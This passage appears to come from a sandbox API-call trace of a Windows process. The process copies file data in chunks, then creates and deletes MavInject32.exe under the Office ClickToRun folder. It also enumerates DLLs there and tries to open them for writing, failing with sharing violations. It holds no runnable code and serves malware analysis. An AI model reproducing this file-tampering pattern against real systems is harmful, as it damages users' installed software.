(in: hFile=0x418, lpBuffer=0x90450, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0096.077] WriteFile (in: hFile=0x33c, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0096.077] ReadFile (in: hFile=0x418, lpBuffer=0x90450, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0096.077] WriteFile (in: hFile=0x33c, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0096.077] ReadFile (in: hFile=0x418, lpBuffer=0x90450, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0096.078] WriteFile (in: hFile=0x33c, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0096.078] ReadFile (in: hFile=0x418, lpBuffer=0x90450, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0096.078] WriteFile (in: hFile=0x33c, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0096.078] ReadFile (in: hFile=0x418, lpBuffer=0x90450, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0096.078] WriteFile (in: hFile=0x33c, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0096.078] ReadFile (in: hFile=0x418, lpBuffer=0x90450, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0096.079] WriteFile (in: hFile=0x33c, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0096.079] ReadFile (in: hFile=0x418, lpBuffer=0x90450, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0096.079] WriteFile (in: hFile=0x33c, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0096.079] ReadFile (in: hFile=0x418, lpBuffer=0x90450, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesRead=0x327f0c4*=0x8d8, lpOverlapped=0x0) returned 1 [0096.079] WriteFile (in: hFile=0x33c, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0096.079] ReadFile (in: hFile=0x418, lpBuffer=0x90450, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesRead=0x327f0c4*=0x0, lpOverlapped=0x0) returned 1 [0096.079] WriteFile (in: hFile=0x33c, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x8e0, lpNumberOfBytesWritten=0x327ef70, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327ef70*=0x8e0, lpOverlapped=0x0) returned 1 [0096.080] CloseHandle (hObject=0x33c) returned 1 [0096.080] CloseHandle (hObject=0x418) returned 1 [0096.080] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\MavInject32.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\mavinject32.exe"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x418 [0096.084] GetFileType (hFile=0x418) returned 0x1 [0096.084] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x85d00 | out: hHeap=0x20000) returned 1 [0096.084] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x8f448 [0096.084] GetLastError () returned 0xb7 [0096.084] SetLastError (dwErrCode=0xb7) [0096.084] WriteFile (in: hFile=0x418, lpBuffer=0x327de50*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x327de4c, lpOverlapped=0x0 | out: lpBuffer=0x327de50*, lpNumberOfBytesWritten=0x327de4c*=0x1, lpOverlapped=0x0) returned 1 [0096.085] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8f448 | out: hHeap=0x20000) returned 1 [0096.085] CloseHandle (hObject=0x418) returned 1 [0096.086] AreFileApisANSI () returned 1 [0096.086] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cd98, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 74 [0096.086] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x94) returned 0x853a0 [0096.086] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cd98, cbMultiByte=-1, lpWideCharStr=0x853a0, cchWideChar=74 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\MavInject32.exe") returned 74 [0096.086] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\MavInject32.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\mavinject32.exe")) returned 1 [0096.087] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x853a0 | out: hHeap=0x20000) returned 1 [0096.087] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0096.087] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0096.087] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0096.087] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf00 | out: hHeap=0x20000) returned 1 [0096.087] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0096.087] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0096.087] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0096.087] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d618 | out: hHeap=0x20000) returned 1 [0096.087] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d588 | out: hHeap=0x20000) returned 1 [0096.087] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x49ca0 | out: hHeap=0x20000) returned 1 [0096.087] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8b680 | out: hHeap=0x20000) returned 1 [0096.088] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cd98 | out: hHeap=0x20000) returned 1 [0096.088] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0096.088] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0096.088] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0096.088] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfe0 | out: hHeap=0x20000) returned 1 [0096.088] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cea0 | out: hHeap=0x20000) returned 1 [0096.088] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0096.088] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0096.088] FindNextFileW (in: hFindFile=0x78490, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80b8a5e2, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x80b8a5e2, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x8745c00, ftLastWriteTime.dwHighDateTime=0x1d0d7aa, nFileSizeHigh=0x0, nFileSizeLow=0x2ffa60, dwReserved0=0x1, dwReserved1=0x0, cFileName="mso20win32client.dll", cAlternateFileName="MSO20W~1.DLL")) returned 1 [0096.088] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0096.088] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4ddc8 [0096.088] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0096.088] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de00 [0096.088] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df88 [0096.088] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dff8 [0096.088] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df88 | out: hHeap=0x20000) returned 1 [0096.088] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de00 | out: hHeap=0x20000) returned 1 [0096.088] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ddc8 | out: hHeap=0x20000) returned 1 [0096.088] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dff8 | out: hHeap=0x20000) returned 1 [0096.088] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d000 [0096.088] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34ff0 [0096.088] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0096.088] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34ff0 | out: hHeap=0x20000) returned 1 [0096.088] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfa0 [0096.088] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35190 [0096.088] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0096.088] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35190 | out: hHeap=0x20000) returned 1 [0096.088] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0d8 [0096.088] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6ecf0 [0096.088] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0096.088] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xbe) returned 0x55f20 [0096.088] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ecf0 | out: hHeap=0x20000) returned 1 [0096.088] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0096.088] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8cf80 [0096.088] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0096.089] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0096.089] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0096.089] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0096.089] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0096.089] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8cf80 | out: hHeap=0x20000) returned 1 [0096.089] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0d8 | out: hHeap=0x20000) returned 1 [0096.089] AreFileApisANSI () returned 1 [0096.089] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\mso20win32client.dll", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\mso20win32client.dll", lpUsedDefaultChar=0x0) returned 79 [0096.089] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d370 [0096.089] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0096.089] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0096.089] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0096.089] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cef0 [0096.089] AreFileApisANSI () returned 1 [0096.089] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d370, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 79 [0096.089] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x9e) returned 0x8ce30 [0096.089] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d370, cbMultiByte=-1, lpWideCharStr=0x8ce30, cchWideChar=79 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\mso20win32client.dll") returned 79 [0096.089] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\mso20win32client.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\mso20win32client.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x418 [0096.089] GetFileType (hFile=0x418) returned 0x1 [0096.090] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ce30 | out: hHeap=0x20000) returned 1 [0096.090] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0096.090] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0096.090] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0096.090] CloseHandle (hObject=0x418) returned 1 [0096.090] AreFileApisANSI () returned 1 [0096.090] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d370, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 79 [0096.090] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x9e) returned 0x8c6f8 [0096.090] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d370, cbMultiByte=-1, lpWideCharStr=0x8c6f8, cchWideChar=79 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\mso20win32client.dll") returned 79 [0096.090] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\mso20win32client.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\mso20win32client.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0096.091] GetLastError () returned 0x20 [0096.091] GetLastError () returned 0x20 [0096.091] SetLastError (dwErrCode=0x20) [0096.091] GetLastError () returned 0x20 [0096.091] SetLastError (dwErrCode=0x20) [0096.091] GetLastError () returned 0x20 [0096.091] SetLastError (dwErrCode=0x20) [0096.091] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c6f8 | out: hHeap=0x20000) returned 1 [0096.091] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0096.091] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0096.091] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d370 | out: hHeap=0x20000) returned 1 [0096.091] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0096.091] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0096.091] FindNextFileW (in: hFindFile=0x78490, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80bb0837, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x80bb0837, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xad6b600, ftLastWriteTime.dwHighDateTime=0x1d0d7aa, nFileSizeHigh=0x0, nFileSizeLow=0x475e60, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="mso30win32client.dll", cAlternateFileName="MSO30W~1.DLL")) returned 1 [0096.091] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0096.091] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e110 [0096.091] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0096.091] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dff8 [0096.091] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0096.091] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df88 [0096.091] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0096.091] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dff8 | out: hHeap=0x20000) returned 1 [0096.092] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e110 | out: hHeap=0x20000) returned 1 [0096.092] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df88 | out: hHeap=0x20000) returned 1 [0096.092] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfe0 [0096.092] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35210 [0096.092] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfe0 | out: hHeap=0x20000) returned 1 [0096.092] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35210 | out: hHeap=0x20000) returned 1 [0096.092] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0096.092] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35210 [0096.092] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0096.092] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35210 | out: hHeap=0x20000) returned 1 [0096.092] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0096.092] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6df20 [0096.092] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de00 [0096.092] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xbe) returned 0x55f20 [0096.092] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6df20 | out: hHeap=0x20000) returned 1 [0096.092] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de00 | out: hHeap=0x20000) returned 1 [0096.092] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8cb90 [0096.092] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0096.092] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0096.092] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0096.092] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0096.092] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0096.092] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8cb90 | out: hHeap=0x20000) returned 1 [0096.092] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0096.092] AreFileApisANSI () returned 1 [0096.092] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\mso30win32client.dll", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\mso30win32client.dll", lpUsedDefaultChar=0x0) returned 79 [0096.092] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d370 [0096.092] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0096.092] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0096.092] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf00 [0096.092] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf10 [0096.093] AreFileApisANSI () returned 1 [0096.093] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d370, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 79 [0096.093] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x9e) returned 0x8cf80 [0096.093] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d370, cbMultiByte=-1, lpWideCharStr=0x8cf80, cchWideChar=79 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\mso30win32client.dll") returned 79 [0096.093] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\mso30win32client.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\mso30win32client.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x418 [0096.093] GetFileType (hFile=0x418) returned 0x1 [0096.093] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8cf80 | out: hHeap=0x20000) returned 1 [0096.093] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0096.093] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0096.094] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0096.094] CloseHandle (hObject=0x418) returned 1 [0096.094] AreFileApisANSI () returned 1 [0096.094] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d370, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 79 [0096.094] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x9e) returned 0x8ced8 [0096.094] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d370, cbMultiByte=-1, lpWideCharStr=0x8ced8, cchWideChar=79 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\mso30win32client.dll") returned 79 [0096.094] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\mso30win32client.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\mso30win32client.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0096.094] GetLastError () returned 0x20 [0096.094] GetLastError () returned 0x20 [0096.094] SetLastError (dwErrCode=0x20) [0096.094] GetLastError () returned 0x20 [0096.094] SetLastError (dwErrCode=0x20) [0096.094] GetLastError () returned 0x20 [0096.094] SetLastError (dwErrCode=0x20) [0096.094] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ced8 | out: hHeap=0x20000) returned 1 [0096.094] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0096.094] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf00 | out: hHeap=0x20000) returned 1 [0096.095] 